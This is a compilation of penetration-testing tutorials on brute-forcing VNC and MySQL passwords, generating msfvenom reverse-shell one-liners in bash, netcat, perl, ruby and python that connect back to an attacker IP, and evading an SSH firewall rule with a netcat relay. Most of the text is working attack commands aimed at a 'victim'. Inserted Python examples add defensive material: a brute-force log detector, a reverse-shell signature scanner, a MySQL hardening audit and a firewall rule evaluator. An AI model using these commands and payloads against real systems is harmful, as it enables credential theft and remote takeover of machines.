6 Ways to Hack VNC Login Password

In this article, we will learn how to gain control over a victim's PC through port 5900, which is used by the VNC service. There are various ways to do it, and we will take the time to learn them all, because different circumstances call for different measures.
Let's start!!

xHydra
This is the graphical version of Hydra, used here to run a dictionary attack against port 5900 to hack a system. For this method to work:
Enter xhydra in your Kali Linux terminal. Select the Single Target option and enter the IP of your victim PC there. Then select VNC in the box against the Protocol option and give the port number 5900 against the Port option.



Now, go to the Passwords tab, select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.


After doing this, go to the Start tab and click on the Start button on the left.

Now the dictionary attack will start. Thus, you will attain the username and password of your victim.


Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more.
Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command:
hydra -s 5900 -P /root/Desktop/pass.txt -t 16 192.168.0.6 vnc
-P: denotes the path of the password list
-s: denotes the destination port number
-t: runs TASKS number of connects in parallel
Once the command is executed it will start the dictionary attack and you will have the right password in no time. As you can observe, we successfully grabbed the VNC password as 098765.




Metasploit
This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
Awesome!! From the image below you can observe that the same password, 098765, has been found by Metasploit.


Patator

Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is quite useful for brute-force attacks on several services such as VNC, HTTP, SMB, etc.
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0




From the image below you can observe that the dictionary attack starts and thus you will attain the password of your victim.




Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.
Run the following command:
medusa -h 192.168.0.6 -u root -P /root/Desktop/pass.txt -M vnc
Here
-u: denotes the username
-P: denotes the path of the password list

As you can observe that we had successfully grabbed the VNC password as 098765.



Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command:
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.0.6:5900
Here
-U: denotes the path of the username list
-P: denotes the path of the password list
As you can observe, we successfully grabbed the VNC password as 098765.
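Every tool above produces the same footprint on the VNC server: a burst of failed authentications from one source, many of them in the same second because of parallel connections (hydra's -t 16), followed by a single success when the wordlist hits, after which the tool stops. The following detector is an added example and not code from the article or from any of the tools it describes. The log format is constructed for the example (real servers such as TigerVNC, x11vnc and RealVNC each log authentication results differently, so only LINE_RE needs adapting); the 192.168.0.6 burst models the attack shown above.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log in a generic "<timestamp> vnc: <src>:<port> authentication <outcome>"
# form. 192.168.0.6 runs a dictionary attack that succeeds on the ninth attempt;
# 192.168.0.9 is a legitimate user with one typo.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z vnc: 192.168.0.9:40110 authentication succeeded
2024-05-01T10:00:01Z vnc: 192.168.0.6:51000 authentication failure
2024-05-01T10:00:01Z vnc: 192.168.0.6:51001 authentication failure
2024-05-01T10:00:01Z vnc: 192.168.0.6:51002 authentication failure
2024-05-01T10:00:02Z vnc: 192.168.0.6:51003 authentication failure
2024-05-01T10:00:02Z vnc: 192.168.0.6:51004 authentication failure
2024-05-01T10:00:02Z vnc: 192.168.0.6:51005 authentication failure
2024-05-01T10:00:03Z vnc: 192.168.0.6:51006 authentication failure
2024-05-01T10:00:03Z vnc: 192.168.0.6:51007 authentication failure
2024-05-01T10:00:04Z vnc: 192.168.0.6:51008 authentication succeeded
2024-05-01T10:05:00Z vnc: 192.168.0.9:40111 authentication failure
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) vnc: (?P<src>\d{1,3}(?:\.\d{1,3}){3}):\d+ "
    r"authentication (?P<outcome>failure|succeeded)$"
)


def parse_line(line):
    """Return (timestamp, source_ip, success) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["src"], m["outcome"] == "succeeded"


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of failures per source IP.

    Emits ("bruteforce", src, n) once a source reaches `threshold` failures inside
    `window`, and ("bruteforce_success", src, n) when a success follows such a
    burst. The second alert is the one that means a password was actually found.
    """
    failures = defaultdict(deque)   # src -> failure timestamps still inside the window
    already_flagged = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, success = parsed
        recent = failures[src]
        while recent and ts - recent[0] > window:
            recent.popleft()        # expire failures older than the window
        if not success:
            recent.append(ts)
            if len(recent) >= threshold and src not in already_flagged:
                alerts.append(("bruteforce", src, len(recent)))
                already_flagged.add(src)
        elif len(recent) >= threshold:
            alerts.append(("bruteforce_success", src, len(recent)))
    return alerts


def analyze_sample():
    """Run the detector over the constructed sample log."""
    return detect_bruteforce(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for kind, src, count in analyze_sample():
        print(f"{kind}: {src} ({count} failures in window)")
```

Classic VNC authentication has no username and no built-in lockout, so rate limiting at the network edge or in the server's access control, plus this kind of burst-then-success alert, is what actually catches the attack.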



Spawn TTY Shell using Msfvenom (One Liner Payload)


Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat by using a single-line payload, also known as a stager, that comes with Metasploit.
Basically there are two types of terminals, TTYs and PTYs. A TTY is the Linux/Unix terminal device for a hardwired terminal, such as a serial connection or the local keyboard and display, while a PTY is a pseudo-TTY, an emulated terminal that gives a copy of the terminal to programs over a network connection such as SSH or telnet.

Let’s start!!
Attacker: Kali Linux
Target: Ubuntu

Open the terminal in your Kali Linux and type msfconsole to load the Metasploit Framework. Now search for all one-liner payloads for UNIX systems using the search command given below; it will list every module that can be used to compromise a UNIX system.
search cmd/unix

From the image below you can observe that it has listed all the exploits that can be used to compromise a UNIX system. In this tutorial we are going to use some of these payloads to spawn a TTY shell.




Compromise Bash shell
In order to compromise a bash shell you can use the reverse_bash payload along with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R
Here we entered the following details to generate the one-liner raw payload:
-p: type of payload you are using, i.e. cmd/unix/reverse_bash
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 1111 (any random port number that is not used by other services)
R: stands for raw payload

As shown in the image below, the size of the generated payload is 67 bytes. Now copy this malicious code and send it to the target. After that, start netcat to accept the reverse connection and wait for the TTY shell.




For example, when the target opens the malicious code (0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121) in a terminal, the attacker will get a reverse shell through netcat.




nc -lvp 1111
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.
For example:
whoami: tells you that you are the root user of the system you have compromised.


Compromise Netcat shell

In order to compromise a netcat shell you can use the reverse_netcat payload along with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R
Here we entered the following details to generate the one-liner raw payload:
-p: type of payload you are using, i.e. cmd/unix/reverse_netcat
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 2222 (any random port number that is not used by other services)
R: stands for raw payload

As shown in the image below, the size of the generated payload is 104 bytes. Now copy this malicious code and send it to the target. After that, start netcat to accept the reverse connection and wait for the TTY shell.





When the target opens the malicious code (mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0 … /tmp/admson 2>&1; rm /tmp/admoszx) in a terminal, the attacker will get a reverse shell through netcat.



nc -lvp 2222
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system.




Compromise Perl shell

In order to compromise a perl shell you can use the reverse_perl payload along with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R
Here we entered the following details to generate the one-liner raw payload:
-p: type of payload you are using, i.e. cmd/unix/reverse_perl
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 3333 (any random port number that is not used by other services)
R: stands for raw payload

As shown in the image below, the size of the generated payload is 232 bytes. Now copy this malicious code and send it to the target. After that, start netcat to accept the reverse connection and wait for the TTY shell.




Now, again, when the target opens the malicious code (perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.103:3333");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};') in a terminal, the attacker will get a reverse shell through netcat.




nc -lvp 3333
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system. Here we found the target IP address, 192.168.1.106, by executing the ifconfig command in the TTY shell.




Compromise Python shell

In order to compromise a python shell you can use the reverse_python payload along with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R
Here we entered the following details to generate the one-liner raw payload:
-p: type of payload you are using, i.e. cmd/unix/reverse_python
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 4444 (any random port number that is not used by other services)
R: stands for raw payload

As shown in the image below, the size of the generated payload is 533 bytes. Now copy this malicious code and send it to the target. After that, start netcat to accept the reverse connection and wait for the TTY shell.

Again, when the target opens the following malicious code in a terminal, the attacker will get a reverse shell through netcat.

python -c "exec('[base64-encoded payload omitted]'.decode('base64'))"



nc -lvp 4444
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.
For example:
ifconfig: shows the IP configuration of the system you have compromised.


Compromise Ruby shell

In order to compromise a ruby shell you can use the reverse_ruby payload along with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R
Here we entered the following details to generate the one-liner raw payload:
-p: type of payload you are using, i.e. cmd/unix/reverse_ruby
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 5555 (any random port number that is not used by other services)
R: stands for raw payload

As shown in the image below, the size of the generated payload is 131 bytes. Now copy this malicious code and send it to the target. After that, start netcat to accept the reverse connection and wait for the TTY shell.


Again, when the target opens the malicious code (ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end') in a terminal, the attacker will get a reverse shell through netcat.


As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.
For example:
ifconfig: shows the IP configuration of the system you have compromised.



Compromise bin/sh shell

In order to compromise a command shell you can use the reverse_netcat_gaping payload along with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R
Here we entered the following details to generate the one-liner raw payload:
-p: type of payload you are using, i.e. cmd/unix/reverse_netcat_gaping
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 6666 (any random port number that is not used by other services)
R: stands for raw payload

As shown in the image below, the size of the generated payload is 533 bytes. Now copy this malicious code and send it to the target. After that, start netcat to accept the reverse connection and wait for the TTY shell.

In order to access the /bin/sh shell of the target system and obtain a TTY shell, we first accessed a PTY terminal on the target through SSH and then pasted the malicious code (nc 192.168.1.103 6666 -e /bin/sh) inside that PTY terminal.

nc -lvp 6666
From the image below you can observe that we successfully obtained a TTY shell on the target system.
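All six payloads in this section end the same way: a shell whose standard input and output are a TCP socket instead of a /dev/pts device, which is the very thing that makes them "TTY" shells only in name. That gives a defender two independent checks, a signature match on the command line and a signature-free look at the shell's file descriptors. The scanner below is an added example and not code from the article or from Metasploit; the rules are constructed from the payload families shown on this page, the process list is made up (the fd targets imitate what readlink() on /proc/<pid>/fd/<n> returns), and both should be tuned before production use.

```python
import re

# Signature rules derived from the payload families shown in this section: bash /dev/tcp
# redirection, netcat with -e or a mkfifo back-channel, perl IO::Socket plus system(),
# ruby TCPSocket plus IO.popen, and python exec() of a base64 blob. Constructed for the
# example; expect to tune them against your own fleet's command lines.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat_exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s(?:-e|-c|--exec|--sh-exec)\s")),
    ("netcat_fifo", re.compile(r"\bmkfifo\s+\S+.*\b(?:nc|ncat|netcat)\b")),
    ("perl_socket_system", re.compile(r"\bperl\b.*IO::Socket::INET.*\bsystem\b")),
    ("ruby_socket_popen", re.compile(r"\bruby\b.*TCPSocket\.new.*IO\.popen")),
    ("python_b64_exec", re.compile(r"\bpython\d?\b.*exec\(.*decode\(['\"]base64['\"]\)")),
]

SHELLS = {"sh", "bash", "dash", "zsh"}


def classify_cmdline(cmdline):
    """Names of the rules a process command line matches (empty list for benign input)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def shell_bound_to_socket(comm, fd_targets):
    """Host-side check that needs no signature at all.

    `comm` is the process name and `fd_targets` maps an fd number to the readlink()
    result of /proc/<pid>/fd/<n>. An interactive shell has fds 0 and 1 on a /dev/pts
    or /dev/tty device; a shell whose stdin and stdout are a socket is what every
    payload in this section produces, whatever language it was written in.
    """
    if comm not in SHELLS:
        return False
    return all(fd_targets.get(fd, "").startswith("socket:[") for fd in (0, 1))


# Constructed sample process list: (comm, cmdline, fd targets). The two malicious
# command lines are the reverse_bash and reverse_netcat_gaping payloads from this page;
# the first "sh" entry is the child shell the bash payload leaves behind.
SAMPLE_PROCESSES = [
    ("sh", "sh", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
    ("bash", "0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121",
     {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    ("nc", "nc 192.168.1.103 6666 -e /bin/sh", {0: "/dev/pts/1", 1: "/dev/pts/1"}),
    ("nc", "nc -zv 192.168.1.7 22", {0: "/dev/pts/2", 1: "/dev/pts/2"}),
    ("python", "python -c print(1)", {0: "/dev/pts/2", 1: "/dev/pts/2"}),
    ("bash", "bash", {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3"}),
]


def scan(processes):
    """Return {cmdline: reasons} for every process that trips a rule or the fd check."""
    hits = {}
    for comm, cmdline, fds in processes:
        reasons = classify_cmdline(cmdline)
        if shell_bound_to_socket(comm, fds):
            reasons.append("shell_stdio_on_socket")
        if reasons:
            hits[cmdline] = reasons
    return hits


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_PROCESSES).items():
        print(f"{reasons}: {cmdline}")
```

The fd check is the more durable of the two: an attacker can rewrite a one-liner to dodge any regex, but the shell still has to talk to the socket, and the page's own msfvenom variants differ only in how they get there.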


Password Cracking:PostgreSQL
5 Ways to Hack MySQL Login


In this article, we will learn how to gain control over a victim's PC through the MySQL service on port 3306. There are various ways to do it, and we will take the time to learn them all, because different circumstances call for different measures.

Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.
Run the following command:
medusa -h 192.168.1.106 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mysql

Here
-U: denotes the path of the username list
-P: denotes the path of the password list
As you can observe, we successfully grabbed the MySQL username as root and the password as toor.




Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command:

ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106:3306

Here
-U: denotes the path of the username list
-P: denotes the path of the password list
As you can observe, we successfully grabbed the MySQL username as root and the password as toor.





xHydra

This is the graphical version of Hydra, used here to run a dictionary attack against port 3306 to hack a system. For this method to work:

Open xhydra in your Kali. Select the Single Target option and enter the IP of your victim PC there. Then select MYSQL in the box against the Protocol option and give the port number 3306 against the Port option.




Now, go to the Passwords tab, select Username List and give the path of your text file, which contains the usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.




After doing this, go to the Start tab and click on the Start button on the left.
Now the dictionary attack will start. Thus, you will attain the username and password of your victim.





Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command:

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 mysql

-L: denotes the path of the username list
-P: denotes the path of the password list
Once the command is executed it will start the dictionary attack and you will have the right username and password in no time. As you can observe, we successfully grabbed the MySQL username as root and the password as toor.





Metasploit
This module simply queries the MySQL instance for a specific user/pass combination (the default is root with a blank password).
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.106
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > set stop_on_success true
msf auxiliary(mysql_login) > run
This will start the brute-force attack and try to find a valid username and password combination using the supplied username and password files.
From the image you can observe that our MySQL server is not secure against brute-force attacks, because it shows the matching combination of username root and password toor for login.
Once the attacker retrieves valid credentials, he can log in to the MySQL server directly to steal or destroy the database information.
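Every method in this article depends on the same four conditions on the server side: port 3306 is reachable from the attacker's host, the account is allowed to connect from there, the password is weak or blank (the module's default of root with no password), and nothing slows down repeated failures. The audit below is an added example and not code from the article or from MySQL; it evaluates a constructed snapshot of server variables and mysql.user rows against those conditions. The variable and column names are MySQL's own (connection_control_* belong to the CONNECTION_CONTROL plugin, validate_password.policy to the VALIDATE_PASSWORD component); the values, hosts and the "<constructed hash>" strings are made up for the example.

```python
# Constructed snapshot modelled on the server attacked above: everything on defaults,
# root reachable from anywhere, plus an anonymous account and a blank password.
PAGE_LIKE_VARIABLES = {
    "bind_address": "*",          # MySQL 8.0 default: listen on every interface
    "skip_networking": "OFF",
    "max_connect_errors": "100",
    # no connection_control_* keys: CONNECTION_CONTROL plugin not installed
    # no validate_password.* keys: VALIDATE_PASSWORD component not installed
}
PAGE_LIKE_USERS = [
    # (User, Host, plugin, authentication_string) as in mysql.user
    ("root", "%", "mysql_native_password", "<constructed hash>"),
    ("", "localhost", "mysql_native_password", ""),           # anonymous account
    ("backup", "192.168.1.%", "mysql_native_password", ""),   # blank password
]

# Constructed hardened snapshot: local-only listener, failed-login throttling,
# password policy, root confined to localhost, one app account from one host.
HARDENED_VARIABLES = {
    "bind_address": "127.0.0.1",
    "skip_networking": "OFF",
    "max_connect_errors": "100",
    "connection_control_failed_connections_threshold": "3",
    "connection_control_min_connection_delay": "1000",   # milliseconds
    "validate_password.policy": "MEDIUM",
}
HARDENED_USERS = [
    ("root", "localhost", "caching_sha2_password", "<constructed hash>"),
    ("app", "10.0.0.5", "caching_sha2_password", "<constructed hash>"),
]

LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")


def audit_mysql(variables, users):
    """Return a list of 'CODE: detail' findings; an empty list means nothing to fix."""
    findings = []
    if (variables.get("skip_networking", "OFF") == "OFF"
            and variables.get("bind_address", "*") in ("*", "0.0.0.0", "::")):
        findings.append("NETWORK_EXPOSED: port 3306 accepts connections on every interface")
    # max_connect_errors counts interrupted handshakes, not wrong passwords, so it does
    # nothing against a dictionary attack; the connection_control plugin is what adds
    # an increasing delay after `threshold` consecutive failures.
    threshold = variables.get("connection_control_failed_connections_threshold")
    if threshold is None:
        findings.append("NO_THROTTLE: CONNECTION_CONTROL plugin not installed")
    elif int(threshold) == 0:
        findings.append("NO_THROTTLE: connection_control_failed_connections_threshold is 0")
    if not any(key.startswith("validate_password") for key in variables):
        findings.append("NO_PASSWORD_POLICY: validate_password not enabled")
    for user, host, plugin, auth in users:
        if user == "":
            findings.append(f"ANONYMOUS_ACCOUNT: ''@'{host}'")
        if auth == "":
            findings.append(f"BLANK_PASSWORD: '{user}'@'{host}'")
        if user == "root" and host not in LOCAL_HOSTS:
            findings.append(f"ROOT_REMOTE: 'root'@'{host}' may log in over the network")
        if plugin == "mysql_native_password":
            findings.append(f"LEGACY_AUTH: '{user}'@'{host}' uses mysql_native_password")
    return findings


def finding_codes(variables, users):
    """Just the distinct finding codes, for a quick pass/fail summary."""
    return {finding.split(":", 1)[0] for finding in audit_mysql(variables, users)}


if __name__ == "__main__":
    for finding in audit_mysql(PAGE_LIKE_VARIABLES, PAGE_LIKE_USERS):
        print(finding)
    print("hardened snapshot findings:", audit_mysql(HARDENED_VARIABLES, HARDENED_USERS))
```

In a real deployment the two inputs come from SHOW VARIABLES and from SELECT User, Host, plugin, authentication_string FROM mysql.user; the checks stay the same.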



Bypass SSH Restriction by Port Relay


Today we are going to access the SSH port, which is blocked by the firewall, by forwarding it to another port through a port relay tool. A netcat relay is a quite useful tool for connecting to any remote system while evading a firewall restriction.
Attacker: Kali Linux (IP: 192.168.1.2)
Victim: Ubuntu Server (IP: 192.168.1.7)
Connect to SSH via port 22
Let's first try to get a normal SSH shell. As you can see in the screenshot, we successfully got an SSH shell on port 22 of the server 192.168.1.7.
Command: ssh pavan@192.168.1.7




Block Port 22 for Incoming TCP Packet
Now let's block the SSH service port 22 for incoming TCP packets using iptables. Here we are making an inbound rule that drops TCP packets to port 22 if the packet source is Kali (192.168.1.2).
Command: iptables -A INPUT -s 192.168.1.2 -p tcp --dport 22 -j DROP




After blocking the port, let's try to get a shell again. From the image below you can observe that we got a Connection Timed Out error, as the packets are dropped by the firewall.




Allow TCP packets on another port
Now let's make a rule in the firewall to accept TCP packets on port 4444 if the packet source is Kali (192.168.1.2).
Command: iptables -I INPUT 1 -s 192.168.1.2 -p tcp --dport 4444 -j ACCEPT



Check Netcat communication between Attacker and Client
Let's check whether we can get a netcat session on port 4444 to Kali (192.168.1.2).

Command: nc -v -l -p 4444



Command: nc 192.168.1.7 4444
As you can see in the image, we have received a netcat session on port 4444 from the SSH server on Kali (192.168.1.2).



Use Netcat Relay backpipe to access SSH service
Now we will have to make a relay. But first, let's understand what the commands depicted below do.
The first command makes a special type of file called a FIFO, or named pipe. We call it backpipe because it is going to carry our responses back through the relay.
The second command makes a netcat listener that is allowed through the firewall. This netcat listener connects its standard input (0<) to the backpipe. We then pipe the standard output of this netcat listener into a netcat client, which connects to localhost (127.0.0.1) on TCP port 22, where sshd listens. We then use the forward redirection (1>) so that data is sent and responses are received simultaneously. We need both the back and the forward pipe because netcat provides two-way communication.
Command: mknod /tmp/backpipe p
[p]: tells mknod to create a FIFO
Command: nc -l -p 4444 0</tmp/backpipe | nc 127.0.0.1 22 1>/tmp/backpipe
[-l]: listener
[-p]: port



Access SSH through Netcat Relay
Now let's try to make the SSH connection through port 4444.
Command: ssh pavan@192.168.1.7 -p 4444
[-p]: specifies the port
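The relay works only because the firewall in this walkthrough is a blocklist: one DROP rule for port 22 sits on an INPUT chain whose policy is still ACCEPT, so port 4444 (and any other port) is reachable from the same source without the second rule ever being needed. The evaluator below is an added example and not code from the article; it replays iptables' first-match semantics for new inbound TCP connections over the two rules given above, then over a constructed default-deny ruleset (policy DROP, SSH allowed only from an assumed admin host 192.168.1.5). It deliberately leaves out the ESTABLISHED,RELATED and loopback rules a real ruleset needs, since they do not affect which new connections are admitted.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Rule:
    """One INPUT-chain rule matching on source network and/or TCP destination port."""
    src: Optional[str]     # CIDR or single address; None matches any source
    dport: Optional[int]   # TCP destination port; None matches any port
    target: str            # "ACCEPT" or "DROP"


def rule_matches(rule: Rule, src_ip: str, dport: int) -> bool:
    if rule.src is not None:
        if ipaddress.ip_address(src_ip) not in ipaddress.ip_network(rule.src, strict=False):
            return False
    if rule.dport is not None and rule.dport != dport:
        return False
    return True


def verdict(chain: List[Rule], policy: str, src_ip: str, dport: int) -> str:
    """iptables semantics for a new inbound SYN: first matching rule wins, else the chain policy."""
    for rule in chain:
        if rule_matches(rule, src_ip, dport):
            return rule.target
    return policy


# Chain exactly as the two commands above build it: "-A INPUT ... --dport 22 -j DROP"
# appends, then "-I INPUT 1 ... --dport 4444 -j ACCEPT" inserts at position 1, so the
# 4444 rule is evaluated first. The INPUT policy was never changed from ACCEPT.
ARTICLE_CHAIN = [Rule("192.168.1.2", 4444, "ACCEPT"), Rule("192.168.1.2", 22, "DROP")]
ARTICLE_POLICY = "ACCEPT"

# Constructed default-deny alternative: SSH only from the admin host (assumed address
# 192.168.1.5), everything else falls through to the DROP policy, so a relay listener
# on 4444 is unreachable no matter who starts it.
HARDENED_CHAIN = [Rule("192.168.1.5/32", 22, "ACCEPT")]
HARDENED_POLICY = "DROP"


def relay_path_open(chain: List[Rule], policy: str, src_ip: str, relay_port: int = 4444) -> bool:
    """True when the source can reach the relay listener, i.e. the port-22 block is bypassable."""
    return verdict(chain, policy, src_ip, relay_port) == "ACCEPT"


if __name__ == "__main__":
    for port in (22, 4444, 5555):
        print(f"article  192.168.1.2 -> :{port} {verdict(ARTICLE_CHAIN, ARTICLE_POLICY, '192.168.1.2', port)}")
        print(f"hardened 192.168.1.2 -> :{port} {verdict(HARDENED_CHAIN, HARDENED_POLICY, '192.168.1.2', port)}")
```

The same reasoning applies to the relay's inner hop: under a default-deny policy the listener on 4444 never accepts, so the second netcat never gets to open 127.0.0.1:22, and the backpipe carries nothing.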


Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester.